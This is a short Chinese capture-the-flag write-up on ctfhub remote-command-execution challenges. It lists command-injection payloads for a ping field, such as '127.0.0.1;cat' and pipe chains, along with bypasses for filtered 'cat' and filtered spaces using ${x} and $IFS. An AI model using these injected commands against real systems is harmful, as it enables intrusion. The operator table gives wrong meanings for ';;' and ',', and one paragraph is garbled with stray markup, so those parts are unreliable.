ctfhub-rce-部分做题记录

命令注入

检查网页显示内容，可以直接看到源代码。大致意思是：检查用户输入的 GET 请求，判断用户是否输入了 ip 信息。如果输入了 ip 信息，则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
输入
127.0.0.1;cat 104211044913917.php
没回显，查看源代码

过滤cat

输入
127.0.0.1;ca${x}t flag_205251882328641.php

也可以
ip=127.0.0.1|cat%20312721736210240.php|base64

过滤空格

我们使用$IFS\mathrm{去}\mathrm{绕}\mathrm{过}IFS\mathrm{是}shell\mathrm{的}\mathrm{特}\mathrm{殊}\mathrm{环}\mathrm{境}\mathrm{变}\mathrm{量}，\mathrm{是}linux\mathrm{下}\mathrm{内}\mathrm{部}\mathrm{域}\mathrm{分}\mathrm{隔}\mathrm{符}。$IFS中储存的值可以是空格、制表符、换行符或其它自定义符号

过滤目录分隔符

127.0.0.1;cd flag_is_here;cat flag_26299244834541.php

过滤运算符

管道符号

管道符号是一个可以连接多个命令的特殊符号。在 Unix 和 Linux 系统命令行中经常使用，通常用于将一个命令的输出作为另一个命令的输入，从而实现多个命令的协同工作。

常见的管道符号：

符号 描述
| 将一个命令的输出作为另一个命令的输入。
|| 在一个命令失败时执行另一个命令。
; 在同一行中运行多个命令。
;; 在同一行中运行多个命令，但只有在前一个命令成功时才会运行后一个命令。
, 按顺序执行多个命令，但只返回最后一个命令的结果。
&& 在一个命令成功时执行另一个命令。
< 将一个文件的内容作为输入传递给一个命令。

将一个命令的输出重定向到一个文件中。

将一个命令的输出追加到一个文件的末尾。